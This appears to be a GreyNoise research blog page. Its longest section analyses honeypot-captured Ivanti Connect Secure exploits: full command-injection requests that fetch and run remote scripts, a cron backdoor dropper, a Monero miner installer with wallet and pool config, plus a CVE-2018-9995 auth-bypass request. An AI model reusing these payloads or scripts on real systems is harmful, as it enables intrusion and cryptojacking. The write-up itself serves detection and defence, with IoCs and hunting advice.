GreyNoise Research

In-depth analysis and trend reporting from the GreyNoise Research team. Includes detection engineering insights, reverse engineering work, and white papers that surface emerging threat trends based on our telemetry — helping defenders stay ahead of risks that are often overlooked or not yet widely known.

GreyNoise Uncovers Early Warning Signals for Emerging Vulnerabilities

It’s well known that the window between CVE disclosure and active exploitation has narrowed. But what happens before a CVE is even disclosed? 

In our latest research “Early Warning Signals: When Attacker Behavior Precedes New Vulnerabilities,” GreyNoise analyzed hundreds of spikes in malicious activity — scanning, brute forcing, exploit attempts, and more — targeting edge technologies. We discovered a consistent and actionable trend: in the vast majority of cases, these spikes were followed by the disclosure of a new CVE affecting the same technology within six weeks. 

This recurring behavior led us to ask: 

Could attacker activity offer defenders an early warning signal for vulnerabilities that don’t exist yet — but soon will? 

The Six-Week Critical Window

Across 216 spikes observed by our Global Observation Grid (GOG) since September 2024, we found: 

  • 80 percent of spikes were followed by a new CVE within six weeks.
  • 50 percent were followed by a CVE disclosure within three weeks. 
  • These patterns were exclusive to enterprise edge technologies like VPNs, firewalls, and remote access tools — the same kinds of systems increasingly targeted by advanced threat actors. 

Why This Matters

Exploit activity may be more than what it seems. Some spikes appear to reflect reconnaissance or exploit-based inventorying. Others may represent probing that ultimately results in new CVE discovery. Either way, defenders can take action. 

Blocking attacker infrastructure involved in these spikes may reduce the chances of being inventoried — and ultimately targeted — when a new CVE emerges. Just as importantly, these trends give CISOs and security leaders a credible reason to harden defenses, request additional resources, or prepare strategic responses based on observable signals — not just after a CVE drops, but weeks before. 

What’s Inside the Report

The full report includes: 

  • A breakdown of the vendors, products, and GreyNoise tags where these patterns were observed.
  • Analysis of attacker behavior leading up to CVE disclosure. 
  • The methodology used to identify spikes and establish spike-to-CVE relationships. 
  • Clear takeaways for analysts and CISOs on how to operationalize this intelligence. 

This research builds on our earlier work on resurgent vulnerabilities, offering a new lens for defenders to track vulnerability risk based on what attackers do — not just what’s been disclosed. 


Where are they now? Starring: Atlassian's Confluence CVE-2023-22527

Ever wonder what happens to vulnerabilities after they're forgotten? 

In a new blog from the GreyNoise Labs team, we look at CVE-2023-22527, an Atlassian Confluence vulnerability that was all over the news back in January 2024, then forgotten a week later. But even though the media has moved on, attackers haven't!

The Labs team digs a little into who the attacker is and their techniques - killing other malware, deleting log files, and even using SSH keys to infect other hosts.

If you're interested in how attackers use old vulnerabilities and what they do once they're on a host, check it out!

Hunting for Fortinet's CVE-2024-21762

Here at GreyNoise, we’re pretty lucky to see a lot of proof of concepts on the wire as they’re released, but sometimes we have to seek them out ourselves. When CVE-2024-21762, an out-of-bounds write vulnerability in Fortinet FortiOS and FortiProxy, was added to CISA’s Known Exploited Vulnerabilities (KEV) Catalog, it became one such case. With no writeup or proof of concept available, follow along as our researcher h0wdy goes down the rabbit hole to get enough information to develop a detection for our sensors. 

Check out the blog!

If you’re just looking for the tag, you can track Fortinet's CVE-2024-21762 here:

Anatomy of a GreyNoise Tag

Tags allow users to see GreyNoise data from a non-IP-centric view. The difference between viewing tags from an IP-centric perspective and a non-IP-centric perspective can be seen in the differences between the visualizer's Today and Tags views.

At the time of writing, the Today view gives us a list of 348,125 IPs, all seen within the last day. Each of these IPs carries different data points like Source Countries, Destination Countries, ASN, and Top Tags. Approaching the data this way shows IPs that contain tags, letting users get a general overview of the characteristics 283,765 machines have shared over the past 24 hours. This is useful and fun information when trying to see the overarching landscape. However, when you need a blocklist or an alert about IPs that may be targeting a specific piece of software or hardware on your network, tags come in handy. In the visualizer's Tags view, IPs are attributed to the specific things users may be interested in, rather than presented as bare IPs. For example, if you're using Cisco routers, you might go to the Tags view and simply query Cisco, resulting in a list of tracked events related to Cisco devices.

The hope is that this design results in an experience more like Googling and less like writing an SQL query to find things that may interest users.

To reiterate, the technical goal of tags is to sort the data from outside the scope of the IP, and this is where GreyNoise classifications come into play. Classifications are split into Intent and Category. Intent is divided into Unknown, Malicious, and Benign, and Category is divided into Activity, Tool, Actor, Worm, and Search Engine. These sets are not limited to CVE-based activity; they include behaviors, attribution, and unique traffic characteristics. This is what the bulk of GreyNoise tags boils down to: tracking either “behaviors,” as in the case of Malicious Activity, or “attribution,” as in the case of a Benign Actor. What’s particularly interesting about these two examples is that there shouldn’t be any overlap between them. When there is, that indicates the potential need to rewrite a tag, which leads to the topic you’ve probably all been waiting for: how a tag gets written.

Malicious Activity and Benign Actor tags work well as examples because of the difference in how they’re tracked. A Malicious Activity tag is heavily based on the contents of captured web packets (PCAP). In contrast, a Benign Actor tag will ideally be based on an IP list; when that can’t be gathered, a combination of rDNS and ASN is used, provided those variables are consistent. This makes writing a Benign Actor tag the more straightforward, yet typically the more time-intensive, of the two.

Writing a Benign Actor tag starts with finding an actor. This is usually suggested by consistent rDNS with a word like bot, scanner, or crawl in its name. We can easily search for this in the viz with metadata.rdns:crawl. This returns a lot of GoogleBot hits. Refine the search some more with metadata.rdns:crawl -actor:"GoogleBot" and we can see some crawlers and actors that have not been tagged yet.



That first unknown IP in the list has crawl-149-56-150-195.dataproviderbot.com as its rDNS. The next question is: have we seen other IPs with dataproviderbot, or something like it, in their rDNS, and if so, are they also benign? A search for metadata.rdns:*dataprovider* will work.



There is no malicious activity to speak of, so they seem benign. This can be verified by trying to find any information about the source. Following the rDNS trail is a good start. The initial crawl link times out, but the parent rDNS resolves to https://www.dataprovider.com/. They seem like a good candidate for a Benign Actor tag, but before reaching out, it’s always worth checking if a tag already exists, and to my surprise, it does: 


However, we don’t seem to be getting any hits for it. After reviewing the query we’re running on the backend, it looks like we’re tagging based on rDNS, but it’s not a match for what we’re seeing. They must have changed their crawler’s name! This is going to need some further investigation. A Google search for dataproviderbot leads to a page about their crawler specifically. Looks like they identify themselves with a User-Agent: 

The Dataprovider.com spider identifies itself with a user agent, which makes it visible in logs and site statistics programs you may use. Look for the following agent: "Mozilla/5.0 (compatible; Dataprovider.com)"

This won’t do, because User-Agents can be easily spoofed. Fortunately, they have a contact link just for questions about the bot! At this point, I would usually just reach out to them, verify that the traffic we’re seeing is theirs, and ask if they can share their IP list. If they cannot share this, it does seem that we may have enough information to write a tag for tracking them anyway: the search for metadata.rdns:*dataprovider* done earlier had some promising results that I hadn’t mentioned.


This information and what we know about their User-Agent and rDNS could suffice.

When tagging this benign actor without an IP list, the primary points of interest are ASN, ORG, and rDNS. The only thing we might consider grabbing from the PCAP’s data field in this case would be the User-Agent. However, when tracking Malicious Activity, or Activity in general, we primarily focus on the data field of PCAP.

Here’s a scrubbed packet that matches a tag I wrote:

GET /device.rsp?opt=user&cmd=list HTTP/1.1
Host: 
Connection: close
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
Cookie: uid=admin
User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:22.0) Gecko/20130405 Firefox/22.0

What information can we gather from this? When discussing this event, we can translate it to: “This is an HTTP GET request for the device.rsp endpoint on the server. The GET request queries for opt=user&cmd=list, and the contents of its Cookie is uid=admin.” Experience and a basic understanding of standard protocols are a considerable help when recognizing anomalies or notable features of a web packet. We can't all have experience, but a plain-text protocol like HTTP has plenty of resources to help us understand what’s going on in this packet. This basic understanding allows us to infer that the request for /device.rsp?opt=user&cmd=list and the uid=admin cookie are likely part of an authentication bypass, making them defining features of this packet. We can check this with a Google search for allintext:"/device.rsp?opt=user&cmd=list". And what do you know!? The first hit is for CVE-2018-9995; the description of this vulnerability makes it pretty clear we’ve found our match!

allow remote attackers to bypass authentication via a "Cookie: uid=admin" header, as demonstrated by a device.rsp?opt=user&cmd=list request that provides credentials within JSON data in a response.

This is an excellent time to pause and point out that the intention of tags is not only to generate data regarding a vulnerability but also to aid in the proliferation of related knowledge. This is achieved through the tag’s description and by providing resources found in the research process. Once we’ve added these, we can form a query to search GreyNoise for similar packets. This is one of the more nuanced aspects of writing tags: finding the balance between making the signature general enough to catch variations of the same event, but specific enough that there are no false positives. An accurate query to the internal GN data set for this event would look something like this:

select * from packets where data like 'GET /device.rsp~?opt=user&cmd=list%user=admin%' escape '~'

The query for this event is pretty straightforward, but in many cases, exploitation may work regardless of capitalization or order of request operands like opt and cmd. In these cases, the query has to be adjusted accordingly.
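For illustration, a hedged sketch of such an adjustment (not our production rule) might lowercase the data and match each operand independently, at the cost of a slightly wider net:

select * from packets
  where lower(data) like 'get /device.rsp~?%' escape '~'
  and lower(data) like '%opt=user%'
  and lower(data) like '%cmd=list%'
  and lower(data) like '%uid=admin%'

Each additional wildcard loosens the signature, so a variant like this needs to be re-checked against known-benign traffic before it ships.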

If you have any more questions about detection engineering and how we write tags here at GreyNoise, please feel free to reach out to me via email or socials: h0wdy@greynoise.io @h0wdy @h0wdy.bsky.social! Also! Please don’t hesitate to message me if you’re new to hacking! I’m also just starting my journey, and I am always down to connect and share knowledge with my fellow n00bs! <3 

Bluetooth Unleashed: Syncing Up with the RattaGATTa Series! Part 1

Are you ready to dive into the fascinating world of Bluetooth Low-Energy (BTLE) and its implications for privacy and security? GreyNoise Labs is thrilled to present the first installment of our series, "RattaGATTa: Scalable Bluetooth Low-Energy Survey." This blog post is not just a narrative—it's an adventure into the intricacies of BTLE, the challenges of hardware and radio frequency, and the importance of rate-limiting algorithms.

Join Remy as he recounts the journey from a simple act of kindness—using BTLE to locate a lost Fitbit—to the development of a sophisticated system capable of identifying and cataloging BTLE devices. Discover the complexities of the domain, the hurdles in measuring security impacts, and the tools that can provide quantitative and qualitative measures. This is a tale of technology, cybersecurity, and the quest for understanding a technology that surrounds us invisibly yet significantly.

In this series, he'll explore the depths of BTLE, from the basics of device identification to the nuances of connection protocols. He'll share insights on custom hardware design, iterative software development, and the real-world challenges that come with radio frequency communications. Whether you're a cybersecurity professional, a tech enthusiast, or simply curious about the wireless world around you, this series promises to enlighten and engage. Stay tuned for more as we unravel the mysteries of Bluetooth Low-Energy together.

Check out the first blog in this series here.

Practical Vulnerability Archaeology Starring Ivanti's CVE-2021-44529

While everybody has been talking about Ivanti vulnerabilities such as CVE-2024-21887 (remote code execution via path traversal - our tag) and CVE-2024-21893 (remote code execution via server-side request forgery - our tag), our labs' team ran into some online discussions about CVE-2021-44529. According to Ivanti's advisory, it's due to "code injection," but online sources claimed it's actually a backdoor. A mystery!   

In a brand new GreyNoise Labs Grimoire blog, Ron pulls out his archaeology tools and investigates what little evidence of this vulnerability remains. While most details have been flushed down the memory hole, tools like the Wayback Machine still have archives that we can explore.

Would you like to know more? Check out the blog!

The Confusing History of F5 BIG-IP RCE Vulnerabilities

In our latest Grimoire post, Ron dives into the confusing web of F5 BIG-IP vulnerabilities. It all started when he found an untagged shell-injection exploit in Sift that looked like—but wasn't—CVE-2021-22986 (a well-known SSRF bug); it was, however, discussed in many of the same write-ups as CVE-2021-22986. But if it's not the SSRF issue, what IS it? Ron works backward and identifies each of the recent F5 BIG-IP vulnerabilities as they're seen on our sensors and uses some advanced sleuthing skills—including talking to the folks who originally wrote about these issues—to track down the mysterious shell-injection vulnerability.

While investigating old F5 vulnerabilities, he found other interesting bits of history. For example, did you know that the CVE-2021-22986 patch fixed two similar (but different) vulnerabilities? And that neither was the shell injection? Or, did you know that there's an intended method for running Linux commands (as root!) against the F5 BIG-IP management port, which is commonly leveraged by authentication bypass issues? We even demonstrate using that built-in (mis?)-feature to escalate any local user to root.

If you want to know way too much about attacks against F5 BIG-IP devices, then this is the blog for you!

Tags referenced:

CVE-2021-22986 - Authentication Bypass via SSRF

CVE-2022-1388 - Auth Bypass via Header Smuggling

CVE-2021-23015 - Post-authentication RCE via Command Injection


CVE-2022-41800 - Post-authentication RCE via .rpmspec Injection

n/a - Post-authentication RCE via /mgmt/tm/util/bash

Ivanti Connect Secure Exploited to Install Cryptominers

One of my favorite things to do each morning is to look at the significant recent vulnerabilities I find interesting - right now, my list is Ivanti Connect Secure, Atlassian Confluence, Apache OFBiz, SnakeYAML, etc. - and check our honeypots to see if any new exploits have dropped since last time. And oh boy, was I rewarded this morning when I checked Ivanti! The overwhelming majority of what we see daily is scanners scanning honeypots and honeypots luring scanners - a security Ouroboros, if you will - but thanks to our new sensors, we have much more insight into what "real" attackers are trying. Let's see what turned up when I lifted the Ivanti rock this morning!

Note: I'm censoring IPs / users in the requests to defang them, but I included them at the bottom in case you want to block them.

Target

These payloads are all leveraging a pair of vulnerabilities in Ivanti Connect Secure - CVE-2023-46805 and CVE-2024-21887, written about here, and with a public exploit available. You can also see the exploitation picking up on our tag.

Payload 1

Here's the first payload that caught my eye:

GET /api/v1/totp/user-backup-code/../../license/keys-status/%3b%77%67%65%74%20%2d%2d%74%69%6d%65%6f%75%74%3d%32%30%20%2d%2d%6e%6f%2d%63%68%65%63%6b%2d%63%65%72%74%69%66%69%63%61%74%65%20%2d%71%20%2d%4f%2d%20%68%74%74%70%73%3a%2f%2f[ip]%2f%69%76%61%6e%74%69%2e%6a%73%7c%73%68%3b%0a HTTP/1.1
Host: [ip]
User-Agent: curl/7.81.0  
Accept: */*

Which decodes to:

/api/v1/totp/user-backup-code/../../license/keys-status/;wget --timeout=20 --no-check-certificate -q -O- https://[ip]/ivanti.js|sh;\n
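If you want to reproduce the decoding yourself, the payload is plain percent-encoding; here's a quick sketch, assuming python3 is available (payload truncated for readability):

$ echo '/api/v1/totp/user-backup-code/../../license/keys-status/%3b%77%67%65%74[...]' | \
    python3 -c 'import sys, urllib.parse; sys.stdout.write(urllib.parse.unquote(sys.stdin.read()))'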

As of writing, that file is live and installs a persistent backdoor using cron:

#!/bin/bash
url='https://[ip]/ivanti'
name1=`date +%s%N`
wget --no-check-certificate ${url} -O /etc/$name1
chmod +x /etc/$name1
echo "*/10 * * * * root /etc/$name1" >> /etc/cron.d/$name1
/etc/$name1

name2=`date +%s%N`
curl -k ${url} -o /etc/$name2
chmod +x /etc/$name2
echo "*/10 * * * * root /etc/$name2" >> /etc/cron.d/$name2
/etc/$name2

name3=`date +%s%N`
wget --no-check-certificate ${url} -O /tmp/$name3
chmod +x /tmp/$name3
(crontab -l ; echo "*/10 * * * * /tmp/$name3") | crontab -
/tmp/$name3

name4=`date +%s%N`
curl -k ${url} -o /var/tmp/$name4
chmod +x /var/tmp/$name4
(crontab -l ; echo "*/10 * * * * /var/tmp/$name4") | crontab -
/var/tmp/$name4

while true
do
	chmod +x /etc/$name1
	/etc/$name1
	sleep 60
	chmod +x /etc/$name2
	/etc/$name2
	sleep 60
	chmod +x /tmp/$name3
	/tmp/$name3
	sleep 60
	chmod +x /var/tmp/$name4
	/var/tmp/$name4
	sleep 60
done

Advice: Check for files that look like /etc/<long number>, /tmp/<long number>, or /var/tmp/<long number>, and check your crontab files for odd entries.
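Here's a rough hunting sketch for those artifacts (GNU find/grep assumed; the names come from date +%s%N, so we match long runs of digits):

# Numeric-named droppers in /etc, /tmp, and /var/tmp
find /etc /tmp /var/tmp -maxdepth 1 -regextype posix-extended -regex '.*/[0-9]{13,}'
# Cron persistence written by the script above
grep -rE '\*/10 \* \* \* \*' /etc/cron.d/ 2>/dev/null
crontab -l 2>/dev/null | grep -E '/(tmp|var/tmp)/[0-9]{13,}'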

The payload it fetches is a 64-bit executable:

$ file backdoor 
backdoor: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, stripped

What does the backdoor do? Let's take the lazy approach - strings:

$ strings -n10 backdoor
[...lots and lots of junk...]
Usage: ispdd [OPTIONS]
  -o, --url=URL                 URL of mining server
  -a, --algo=ALGO               mining algorithm https://ispdd.com/docs/algorithms
      --coin=COIN               specify coin instead of algorithm
  -u, --user=USERNAME           username for mining server
  -p, --pass=PASSWORD           password for mining server
  -O, --userpass=U:P            username:password pair for mining server
  -x, --proxy=HOST:PORT         connect through a SOCKS5 proxy
  -k, --keepalive               send keepalived packet for prevent timeout (needs pool support)
[...]

Aha, a cryptominer!

Payload 2

Next up, this payload:

GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bwget%20https%3a%2f%2fraw%2egithubusercontent%2ecom%2fmomika233%2ftest%2fmain%2fm%2esh%20%26%26%20chmod%20%2bx%20m%2esh%20%26%26%20bash%20m%2esh HTTP/1.1  
Host: [ip]  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36  
Connection: close  
Accept-Encoding: gzip

Which decodes to:

/api/v1/totp/user-backup-code/../../license/keys-status/;wget https://raw.githubusercontent.com/[user]/test/main/m.sh && chmod +x m.sh && bash m.sh

Unsurprisingly, m.sh is a shell script:

#!/bin/bash
cd /tmp && wget https://github.com/[user]/test/raw/main/watchd0g && chmod +x watchd0g && ./watchd0g
cd /tmp && wget  https://github.com/[user]/test/raw/main/watchbog && chmod +x watchbog && ./watchbog

Kinda weirdly, the "scripts" are actually 64-bit and 32-bit executables:

$ file watch*
watchbog: ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, no section header
watchd0g: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, no section header

Both files are UPX-packed (what year is this?), which is fortunately quite easy to unpack:

$ dnf install upx

$ upx -d watchbog 
                       Ultimate Packer for eXecutables
                          Copyright (C) 1996 - 2024
UPX 4.2.2       Markus Oberhumer, Laszlo Molnar & John Reiser    Jan 3rd 2024

        File size         Ratio      Format      Name
   --------------------   ------   -----------   -----------
  11911882 -   4454800   37.40%   linux/i386    watchbog

Unpacked 1 file.

$ upx -d watchd0g 
                       Ultimate Packer for eXecutables
                          Copyright (C) 1996 - 2024
UPX 4.2.2       Markus Oberhumer, Laszlo Molnar & John Reiser    Jan 3rd 2024

        File size         Ratio      Format      Name
   --------------------   ------   -----------   -----------
  12519601 -   4741804   37.88%   linux/amd64   watchd0g

Unpacked 1 file.

Those files appear to be written in Go and somewhat obfuscated (or maybe Go always looks obfuscated?) - in any case, the strings command doesn't tell me much other than an SSH private key:

-----BEGIN PRIVATE KEY-----
MC4CAQAwBQYDK2VwBCIEIDWHqbKNp4h9inuerCayD7NO6glM9bnHjB+WcmT2Prfa
-----END PRIVATE KEY-----
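As an aside, if you're curious about the key itself, drop the PEM block into a scratch file and ask openssl; the ASN.1 header in this blob identifies it as an Ed25519 key:

$ openssl pkey -in key.pem -noout -text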

Rather than spending a lot of time digging into this, I decided to move on to the next thing. Searching by checksum, it does appear that watchd0g is known malware.

Advice: check for /tmp/watchd0g and /tmp/watchbog

Payload 3

And finally, the last payload:

GET /api/v1/totp/user-backup-code/../../license/keys-status/%3b(type%20curl%20&%3E/dev/null;%20curl%20-o%20/tmp/script.sh%20http://[ip]:8089/u/123/100123/202401/d9a10f4568b649acae7bc2fe51fb5a98.sh%20%7C%7C%20type%20wget%20&%3E/dev/null;%20wget%20-O%20/tmp/script.sh%20http://[ip]:8089/u/123/100123/202401/d9a10f4568b649acae7bc2fe51fb5a98.sh);%20chmod%20+x%20/tmp/script.sh;%20/tmp/script.sh HTTP/1.1  
Host: 128.199.174.6  
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36  
Connection: close  
Accept-Encoding: gzip

Which decodes to:

/api/v1/totp/user-backup-code/../../license/keys-status/;(type curl &>/dev/null; curl -o /tmp/script.sh http://[ip]:8089/u/123/100123/202401/d9a10f4568b649acae7bc2fe51fb5a98.sh || type wget &>/dev/null; wget -O /tmp/script.sh http://[ip]:8089/u/123/100123/202401/d9a10f4568b649acae7bc2fe51fb5a98.sh); chmod +x /tmp/script.sh; /tmp/script.sh

And the shellscript it fetches:

$ cat script.sh 
#!/bin/bash

WALLET=45yeuMC5LauAg18s7JPvpwNmPqDUrgZnhYwpQnbpo5PJKttK4GrjqS2jN1bemwMjrTc7QG414P6XgNZQGbhpwsnrKUsKSt5
EMAIL=$2
if [ -z $HOME ]; then
  HOME=/var/tmp/
fi


CPU_THREADS=$(nproc)
EXP_MONERO_HASHRATE=$(( CPU_THREADS * 700 / 1000))
if [ -z $EXP_MONERO_HASHRATE ]; then
  exit 1
fi

power2() {
  if ! type bc >/dev/null; then
    if   [ "$1" -gt "8192" ]; then
      echo "8192"
    elif [ "$1" -gt "4096" ]; then
      echo "4096"
    elif [ "$1" -gt "2048" ]; then
      echo "2048"
    elif [ "$1" -gt "1024" ]; then
      echo "1024"
    elif [ "$1" -gt "512" ]; then
      echo "512"
    elif [ "$1" -gt "256" ]; then
      echo "256"
    elif [ "$1" -gt "128" ]; then
      echo "128"
    elif [ "$1" -gt "64" ]; then
      echo "64"
    elif [ "$1" -gt "32" ]; then
      echo "32"
    elif [ "$1" -gt "16" ]; then
      echo "16"
    elif [ "$1" -gt "8" ]; then
      echo "8"
    elif [ "$1" -gt "4" ]; then
      echo "4"
    elif [ "$1" -gt "2" ]; then
      echo "2"
    else
      echo "1"
    fi
  else 
    echo "x=l($1)/l(2); scale=0; 2^((x+0.5)/1)" | bc -l;
  fi
}

PORT=$(( $EXP_MONERO_HASHRATE * 30 ))
PORT=$(( $PORT == 0 ? 1 : $PORT ))
PORT=`power2 $PORT`
PORT=$(( 10000 + $PORT ))
if [ -z $PORT ]; then
  echo "ERROR: Can't compute port"
  exit 1
fi

if [ "$PORT" -lt "10001" -o "$PORT" -gt "18192" ]; then
  echo "ERROR: Wrong computed port value: $PORT"
  exit 1
fi



if sudo -n true 2>/dev/null; then
  sudo systemctl stop .ssh_miner.service
fi
killall -9 xmrig

rm -rf $HOME/.ssh
[ -d $HOME/.ssh ] || mkdir $HOME/.ssh
if ! curl  "http://[ip]:8089/u/123/100123/202401/sshd" -o $HOME/.ssh/sshd; then
  if ! wget "http://[ip]:8089/u/123/100123/202401/sshd" -O $HOME/.ssh/sshd; then
    echo "ERROR: Can't download sshd"
    exit 1
  fi
fi

if ! curl  "http://[ip]:8089/u/123/100123/202401/31a5f4ceae1e45e1a3cd30f5d7604d89.json" -o $HOME/.ssh/config.json; then
  if ! wget "http://[ip]:8089/u/123/100123/202401/31a5f4ceae1e45e1a3cd30f5d7604d89.json" -o $HOME/.ssh/config.json; then
    echo "ERROR: Can't download config"
    exit 1
  fi
fi

chmod +x $HOME/.ssh/sshd


PASS=`hostname | cut -f1 -d"." | sed -r 's/[^a-zA-Z0-9\-]+/_/g'`
if [ "$PASS" == "localhost" ]; then
  PASS=`ip route get 1 | awk '{print $NF;exit}'`
fi
if [ -z $PASS ]; then
  PASS=na
fi
if [ ! -z $EMAIL ]; then
  PASS="$PASS:$EMAIL"
fi


sed -i 's/"user": *"[^"]*",/"user": "'$WALLET'",/' $HOME/.ssh/config.json
sed -i 's/"pass": *"[^"]*",/"pass": "'$PASS'",/' $HOME/.ssh/config.json
sed -i 's#"log-file": *null,#"log-file": "'$HOME/.ssh/sshd.log'",#' $HOME/.ssh/config.json
sed -i 's/"syslog": *[^,]*,/"syslog": true,/' $HOME/.ssh/config.json

cp $HOME/.ssh/config.json $HOME/.ssh/config_background.json
sed -i 's/"background": *false,/"background": true,/' $HOME/.ssh/config_background.json

cat >$HOME/.ssh/miner.sh <<EOL
#!/bin/bash
if ! pidof sshd >/dev/null; then
  nice $HOME/.ssh/sshd \$*
else
  echo "Monero miner is already running in the background. Refusing to run another one."
  echo "Run \"killall xmrig\" or \"sudo killall xmrig\" if you want to remove background miner first."
fi
EOL

chmod +x $HOME/.ssh/miner.sh

# 创建计划任务 ("create a scheduled task")

if ! sudo -n true 2>/dev/null; then
  if ! grep .ssh/miner.sh $HOME/.profile >/dev/null; then
    echo "[*] Adding $HOME/.ssh/miner.sh script to $HOME/.profile"
    echo "$HOME/.ssh/miner.sh --config=$HOME/.ssh/config_background.json >/dev/null 2>&1" >>$HOME/.profile
  else 
    echo "Looks like $HOME/.ssh/miner.sh script is already in the $HOME/.profile"
  fi
  echo "[*] Running miner in the background (see logs in $HOME/.ssh/sshd.log file)"
  /bin/bash $HOME/.ssh/miner.sh --config=$HOME/.ssh/config_background.json >/dev/null 2>&1
else

  if [[ $(grep MemTotal /proc/meminfo | awk '{print $2}') > 3500000 ]]; then
    echo "[*] Enabling huge pages"
    echo "vm.nr_hugepages=$((1168+$(nproc)))" | sudo tee -a /etc/sysctl.conf
    sudo sysctl -w vm.nr_hugepages=$((1168+$(nproc)))
  fi

  if ! type systemctl >/dev/null; then

    echo "[*] Running miner in the background (see logs in $HOME/.ssh/sshd.log file)"
    /bin/bash $HOME/.ssh/miner.sh --config=$HOME/.ssh/config_background.json >/dev/null 2>&1
    echo "ERROR: This script requires \"systemctl\" systemd utility to work correctly."
    echo "Please move to a more modern Linux distribution or setup miner activation after reboot yourself if possible."

  else

    echo "[*] Creating .ssh_miner systemd service"
    cat >/tmp/.ssh_miner.service <<EOL
[...systemd unit definition elided from the original capture...]
EOL
    sudo systemctl daemon-reload
    sudo systemctl enable .ssh_miner.service
    sudo systemctl start .ssh_miner.service
  fi
fi

That appears to install the miner as a fake "sshd" binary, drop a .json configuration file, and set up a systemd service, as well as a backdoor in the user's .profile file. Here's the configuration file:

{
    "api": {
        "id": null,
        "worker-id": null
    },
    "http": {
        "enabled": false,
        "host": "127.0.0.1",
        "port": 0,
        "access-token": null,
        "restricted": true
    },
    "autosave": true,
    "background": false,
    "colors": true,
    "title": true,
    "randomx": {
        "init": -1,
        "init-avx2": 0,
        "mode": "auto",
        "1gb-pages": false,
        "rdmsr": true,
        "wrmsr": true,
        "cache_qos": false,
        "numa": true,
        "scratchpad_prefetch_mode": 1
    },
    "cpu": {
        "enabled": true,
        "huge-pages": true,
        "huge-pages-jit": false,
        "hw-aes": null,
        "priority": null,
        "memory-pool": true,
        "yield": true,
        "max-threads-hint": 40,
        "asm": true,
        "argon2-impl": null,
        "astrobwt-max-size": 550,
        "astrobwt-avx2": false,
        "cn/0": false,
        "cn-lite/0": false
    },
    "opencl": {
        "enabled": false,
        "cache": true,
        "loader": null,
        "platform": "AMD",
        "adl": true,
        "cn/0": false,
        "cn-lite/0": false,
        "panthera": false
    },
    "cuda": {
        "enabled": false,
        "loader": null,
        "nvml": true,
        "cn/0": false,
        "cn-lite/0": false,
        "panthera": false,
        "astrobwt": false
    },
    "donate-level": 1,
    "donate-over-proxy": 1,
    "log-file": null,
    "pools": [
        {
            "algo": null,
            "coin": null,
            "url": "auto.c3pool.org:19999",
            "user": "45yeuMC5LauAg18s7JPvpwNmPqDUrgZnhYwpQnbpo5PJKttK4GrjqS2jN1bemwMjrTc7QG414P6XgNZQGbhpwsnrKUsKSt5",
            "pass": "default",
            "rig-id": null,
            "nicehash": false,
            "keepalive": true,
            "enabled": true,
            "tls": false,
            "tls-fingerprint": null,
            "daemon": false,
            "socks5": null,
            "self-select": null,
            "submit-to-origin": false
        },
        {
            "algo": null,
            "coin": null,
            "url": "auto.c3pool.org:19999",
            "user": "43uAMN5SYT45ZQqeNS6jkW5ssKjm7N4bmLT5uL49bvxGJnsPywn2zPhQA8nHc9XTGXavrstGj3pFy4geh3dV2x9uM8TfwzJ",
            "pass": "default",
            "rig-id": null,
            "nicehash": false,
            "keepalive": true,
            "enabled": true,
            "tls": false,
            "tls-fingerprint": null,
            "daemon": false,
            "socks5": null,
            "self-select": null,
            "submit-to-origin": false
        }
    ],
    "print-time": 60,
    "health-print-time": 60,
    "dmi": true,
    "retries": 5,
    "retry-pause": 5,
    "syslog": false,
    "tls": {
        "enabled": false,
        "protocols": null,
        "cert": null,
        "cert_key": null,
        "ciphers": null,
        "ciphersuites": null,
        "dhparam": null
    },
    "user-agent": null,
    "verbose": 0,
    "watch": true,
    "rebench-algo": false,
    "bench-algo-time": 20,
    "pause-on-battery": false,
    "pause-on-active": false

Advice: Check for a systemd service called .ssh_miner, a .profile entry that runs a miner, or a file called /tmp/script.sh.
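A minimal sketch of those checks (standard shell and systemd assumed; run per user for the $HOME paths):

systemctl list-units --all 2>/dev/null | grep -F '.ssh_miner'   # hidden systemd service
grep -F '.ssh/miner.sh' "$HOME/.profile" 2>/dev/null            # .profile persistence
ls -la /tmp/script.sh "$HOME/.ssh/" 2>/dev/null                 # dropped miner, config, and script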

IoCs

Here are the SHA256 sums of all the files I saw:

  • 0c9ada54a8a928a747d29d4132565c4ccecca0a02abe8675914a70e82c5918d2  backdoor
  • bbfba00485901f859cf532925e83a2540adfe01556886837d8648cd92519c68d  ivanti.js
  • cf20940907be484440e8343aa05505ad2e4d6d1f24ef29504bfa54ade4a8455f  m.sh
  • 8eadb5beeb21d4a95dacd133cb2b934342fcb39fe4df2a8387a0d5499c72450d  watchbog
  • 1e1e94bd2bfd5054265123bf55c4cf6ce87de6692d9329bda4a37e89272356e4  watchd0g
  • 45c9578bbceb2ce2b0f10133d2f3f708e78c8b7eb3c52ad69d686e822f9aa65f  config.json
  • 4cba272d83f6ff353eb05e117a1057699200a996d483ca56fa189e9eaa6bb56c  script.sh

And some file paths:

  • /etc/<long number>
  • /etc/cron.d/<long number>
  • /tmp/<long number>
  • /var/tmp/<long number>
  • m.sh
  • /tmp/watchd0g
  • /tmp/watchbog
  • /tmp/script.sh
  • $HOME/.ssh/config.json
  • $HOME/.ssh/sshd
  • $HOME/.ssh/config_background.json

And the IP addresses / users I observed:

  • 45.130.22.219
  • https[:]//raw.githubusercontent.com/momika233
  • 192.252.183.116

We recommend organizations block IPs that have recently exploited Ivanti. We have published a Gist containing these IPs.

CVE-2022-1471: SnakeYAML Deserialization Deep Dive

SnakeYAML has slithered its way into a deserialization vulnerability, with versions before 2.0 allowing remote code execution when used to parse untrusted input. In this GreyNoise Labs post, Lead Security Researcher Ron Bowes digs into the technical details, drama, and exploits around CVE-2022-1471.  

By default, SnakeYAML allows the instantiation of arbitrary Java classes from untrusted YAML sources. This "insecure by default" design has led to at least eight different vulnerabilities prior to its official designation as a CVE. We'll highlight the unhelpful responses from developers and the importance of secure defaults.

Additionally, we'll demonstrate how to build a vulnerable app and understand how the deserialization actually works, developing an exploit to demonstrate how to achieve remote code execution.

